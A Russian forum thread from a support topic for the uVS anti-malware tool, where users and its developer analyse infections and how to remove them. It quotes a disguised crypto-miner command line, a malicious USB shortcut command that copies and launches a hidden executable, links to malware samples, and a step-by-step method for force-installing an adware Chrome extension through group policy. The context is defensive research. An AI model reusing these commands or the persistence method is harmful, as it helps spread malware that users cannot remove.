Universal Virus Sniffer (uVS), Вопросы разработчику

[PR55.RP55 83]

Demkd

Большая просьба...

http://www.anti-malware.ru/forum/index.php...st&p=175852

Я конечно понимаю - люди у нас терпеливые, морально устойчивые...

Но сколько можно ?

[Smit 29]

чистить темп не пробовал? плохая шутка ,я начал чистить темпы еще задолго до изобретения этой программы (в основном "батником")

с двумя слэшами давно уже не удаляются ссылки последняя версия пыталась удалить я даже сделал скрини но к сожалению удалил их вместе с другими .. я грешным делом подумал что это именно слеши виноваты...

ps жаль что из за погони за скоростью не хватает времени на исследование, создание образов и пр

[g0dl1ke 26]

спасибо demkd - при помощи uvs удалось задетектить майнер криптовалюты

https://www.virustotal.com/ru/file/903f8e19...sis/1390733179/

https://www.virustotal.com/ru/file/4ffdc458...sis/1390733181/

собственно опять авторан через шедулер (видимо сейчас это модно)

C:\Users\Alex\AppData\Roaming\Malwarebytes\chrome.exe" --scrypt -o stratum+tcp://37.1.219.68:9007 -u strizon.2 -p x -w 256 -I 11

образ машины: http://rghost.ru/private/51935781/36444fc9...32d522f54a39650

файлы конфигов майнера (если кому то это будет интересно): http://rghost.ru/private/51935937/78272e53...eaaf5d0e3df97a1

[Smit 29]

столкнулся с таким случаем удаляю вирусы программой они восстанавливаться после перезагрузки .

ситуация следующая : вирусы с компьютера превращают все папки на флешке в "невидимые" а вместо них лежат ярлычки (к этим папкам) эмитирующие эти папки ,а также в скрытом виде кладут вирус в корень флеши .

самое интересное это сами модифицированные ярлыки к папкам вот их содержимое :

%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe /c "%SystemRoot%\explorer.exe %cd%[b]название папки жертвы[/b] & attrib -s -h %cd%HKNVAsF.exe & xcopy /F /S /Q /H /R /Y %cd%HKNVAsF.exe %temp%\lrHwn\ & attrib +s +h %cd%HKNVAsF.exe & start %temp%\lrHwn\HKNVAsF.exe & exit"

программа конечно паказывает где лежать вирусы , а также в запуске "неявных или в ручную" тоже но почему при удалении вирусов не удаляются модифицированные ярлычки и посчемуто не палиться вирус на флешке !?

если автору будет интересно и свободное время могу выложить "тушки"

[santy 153]

если автору будет интересно и свободное время могу выложить "тушки"

Smit, эти "тушки" кто нибудь из антивирусов детектирует? как хоть называется детект? (если он есть)

[g0dl1ke 26]

хотя бы отчет вирустотал бэ

[priv8v 960]

ставлю на то, что детектов >20

[Smit 29]

g0dl1ke

priv8v ставлю на то, что детектов >20 smile.gif

тоесть прога не детектит , на свалку ее? или к чему этот ваш стеб?

при чем тут детект вообще? удалять надо не только то что детектится , а еще и причину запуска вирусов как минимум, а как максимум восстановить работу системы как было!

воистину дети рекламы и нода

[priv8v 960]

тоесть прога не детектит , на свалку ее? или к чему этот ваш стеб?

К demkd и его данной деятельности отношусь с уважением и стеба не было. Ссылка на ВТ нужна для того, чтоб все сразу было видно вообще что за файл. Если бы файл понадобился, то я бы его выдал нуждающимся и может какой мини-реверс сделал, коли потребовалось бы. А попытка угадать кол-во детектов - это наш междусобойный юмор (угадывать по имени файла и методу распространения уровень детекта). Разумеется ни кому в голову не приходит, что утилита должна все сигнатурно детектить - не перекладывайте свои мысли в головы других людей

[Smit 29]

priv8v не перекладывайте свои мысли в головы других людей

а я и не мыслил , что кто то мыслил, что я мыслил :"перекладывать мысли"

это могут только экстрасенсы и / или талантливые учителя , спс за лесть!

а если по делу вы ничего не хотели написать? к примеру если бы программа действительно могла удалять модифицированные ярлыки: если удаляется сам файл? или это роскошь!? если антивири этого не делают то и uvs не должен? и тут не нужно знать ни сигнатуры ни чего то особенного, если программа умеет удалять ссылки на удаляемый файл , пусть удаляет и ярлыки на негоже, весьма логично! (ярлык это тоже ссылка, невероятно но факт!)

[PR55.RP55 83]

Demkd

В системе скажем в директории \User Data\Default\Extensions\

Есть .JS объекты.

Этот: https://www.virustotal.com/ru/file/87e92171...sis/1391178703/

Дело в том, что после удаления данная дрянь восстанавливается...

И Браузер снова подгружает данное расширение.

Как средствами системы или uVS можно блокировать запуск этого объекта без отключения JavaScript. ?

[PR55.RP55 83]

rghost.ru/52095809

Для установке в Хроме: настройки > расширения > копируем файл на страницу > подтверждаем = получаем удовольствие.

Единственно с правами всё здесь попроще...

[goover 37]

До 28 версии так делалось через реестр с помощью ключей:

_ Software\Policies\Google\Chrome\ExtensionInstallSources

_ Software\Policies\Google\Chrome\ExtensionInstallForcelist

С 28 через политики windows (устанавливается шаблон). Реестр должен игнорироваться.

В адресной строке можно ввести chrome://policy и посмотреть, что покажет.

Установил выложенный на rghost.ru/52095809 через политики :

[PR55.RP55 83]

goover +

Спасибо за помощь.

Теперь дело за Demkd.

[PR55.RP55 83]

htt*://mediaply.net/mediaplayer/update/updateMediaPlayerV1alpha257.xml

Где MediaPlayerV1alpha***

*** От 257 до 800

На google.com жуткая паника и шпионская паранойя с 30 числа....

Решение _они_ так за три дня и не нашли.

---

[santy 153]

С 28 через политики windows (устанавливается шаблон). Реестр должен игнорироваться.

В адресной строке можно ввести chrome://policy и посмотреть, что покажет.

Установил выложенный на rghost.ru/52095809 через политики :

goover, а можно подробнее, как расширение добавлено через политики. (и где это инфо хранится)

[goover 37]

Опишу как я делал ( Win 7 x32 , Chrome ver. 32 ) :

Тут шаблон политик для хрома: http://www.chromium.org/administrators/policy-templates ( скачать - Zip file of ADM/ADMX templates and documentation ). Из архива нужен - windows\adm\ru\chrome.adm. Добавляем его в gpedit.msc для всех юзеров:

- Конфигурация компьютера - Административные шаблоны. На 'Административные шаблоны' правой кнопкой мыши, в меню жмем 'Добавление и удаление шаблонов'. Добавляем chrome.adm.

На последнем скрине PR55.RP55 видно, что расширение грузится из интернета ( с mediaply.net ). Я грузил с рабочего стола.

Положил на него 3 файла: 1.1_0.crx, 1.1_0.pem (распаковал из архива с расширением) и создал файл update.xml с содержимым

                             <?xml version='1.0' encoding='UTF-8'?>                               <gupdate xmlns='http://www.google.com/update2/response' protocol='2.0'>                               <app appid='ojaliajcmgpnmmalbegllddmoimfnlle'>                                 <updatecheck codebase='file:///C:/Users/user/Desktop/1.1_0.crx' version='1.1' />                               </app>                             </gupdate>

Через gpedit.msc включаем и настраиваем политику:

Запускаем Chrome, открываем любые сайты и любуемся на рекламу и popup-ы.

Что в резальтате получилось:

1) политика сохранилась в реестре

             [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist]               "1"="ojaliajcmgpnmmalbegllddmoimfnlle;file:///C:/Users/user/Desktop/update.xml"

2) политика сохранилась в C:\Users\All Users\ntuser.pol

3) политика сохранилась в C:\Windows\System32\GroupPolicy\Machine\Registry.pol

( может политики ещё где сохраняются, не знаю, в любом случае их надо отключать через соответствующий интерфейс, а не удалять файлы ntuser.pol, Registry.pol, ... ).

4) также в \User Data\Default\Extensions\ появилась папка "ojaliajcmgpnmmalbegllddmoimfnlle" с этим расширением.

Ключ в реестре и папку с расширением можно удалить - все равно при старте браузера расширение будет подключаться и работать.

Если писАть только в реестр

             [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist]               "1"="ojaliajcmgpnmmalbegllddmoimfnlle;file:///C:/Users/user/Desktop/update.xml"

то расширение не подключается.

[demkd 636]

Ключ в реестре и папку с расширением можно удалить - все равно при старте браузера расширение будет подключаться и работать.

а если после удаления ключа перезагрузить систему? или просто обновить политики gpupdate /force?

в v .10 что уже доступна для обновления ключ с политиками гугля сносится под корень 27-м твиком

а софт от гугля, да, сплошная дыра, спецов по безопасности походу у них вообще нет.

[santy 153]

demkd,

удаление ключа (в реестре) в том числе с gpupdate & restart не решает проблему, политика продожает работать, расширение остается активным и защищенным корпоративной политикой.

---------------

(точнее, это видимо работает для Chrome c v <28.)

в v 32 помогает удаление файла registry.pol. в этом случае административный шаблон сохраняется, но добавленная ранее политика отключается.

т.е. удалять ключ политики следует не из реестра, а через очистку политики из файла registry.pol, если в нее добавляются полезные политики из других административных шаблонов.

[goover 37]

а если после удаления ключа перезагрузить систему? или просто обновить политики gpupdate /force?

ну так попробуйте

https://code.google.com/p/chromium/issues/detail?id=259470

[santy 153]

goover, в связи с этим вопрос:

политики добавленные из разных административных шаблонов все сохраняются в registry.pol, или для каждого шаблона будет свой файл *.pol?

[goover 37]

Без понятия

Я не программист и не системный администратор. И так глубоко данный вопрос не исследовал. На него скорее demkd может ответить.

IMHO, все будут в registry.pol. Только, например, на работе у меня их три:

Если интересно - пробуйте и смотрите :

в дополнение к шаблону хрома можно поставить шаблон для firefox (http://sourceforge.net/projects/gpofirefox...ox.adm/download), включить там и там по политике, и посмотреть что получится.

[santy 153]

да, все пишется в Registry.pol

Ну и наконец, в папках Machine и User находятся файлы Registry.pol. Эти файлы появляются, когда в разделе «Административные шаблоны» (Administrative Templates) определяется какой-нибудь параметр. Файл Registry.pol тесно связан с административными шаблонами (.adm). Административные шаблоны содержат параметры реестра, которые возможно сконфигурировать с помощью групповых политик. Ключевое слово здесь – «возможно». Registry.pol содержит сконфигурированные параметры.

Когда вы открываете редактор политик, он создает временную ветвь реестра с двумя узлами: user и machine. Когда вы передвигаетесь по узлам «административных шаблонов» в редакторе политик, редактор политик показывает вам соответствующие разделы административных шаблонов (.adm), подгружая их динамически (после выбора соответствующего раздела шаблонов). Все просмотренные параметры кэшируются.

Когда вы выбираете какую-нибудь политику, редактор политики читает временную ветвь реестра для того, чтобы определить значение этой политики (параметра). Если во временной ветви нет значения, запрашивается значение по умолчанию из .adm файла. Если в .adm файле нет значения по умолчанию, запрашивается соответствующее клиентское расширение.

Все параметры (политики), которые вы определяете в процессе редактирования раздела «Административные шаблоны» GPO, сохраняются во временной ветви реестра. Когда вы закрываете редактор политик, ветвь реестра импортируется в соответствующие файлы Registry.pol (в папке user или machine).

Впоследствии при открытии редактора групповой политики в создаваемую временную ветвь реестра импортируются соответствующие файлы Registry.pol, чтобы вы видели текущие настройки политик.

from ru-board.com

[Smit 29]

Кто подскажет, чем отличается горячая клавиша Ctrl+Z (Отменить предыдущую команду (только при работе с образом)) от Alt+Backspace (Отменить предыдущую команду (только при работе с образом))?

ктото прокомментировал это так :

"ну если у вас вдруг сломалась клавиша Ctrl можно использовать другую комбинацию"

а если без шуток!??

[demkd 636]

Smit

ничем

goover

спасибо, вроде как я нашел как эти GPO прибивать программно и сразу во всех местах, включу в след версию и почему-то расширение само сносится... наверное так задумано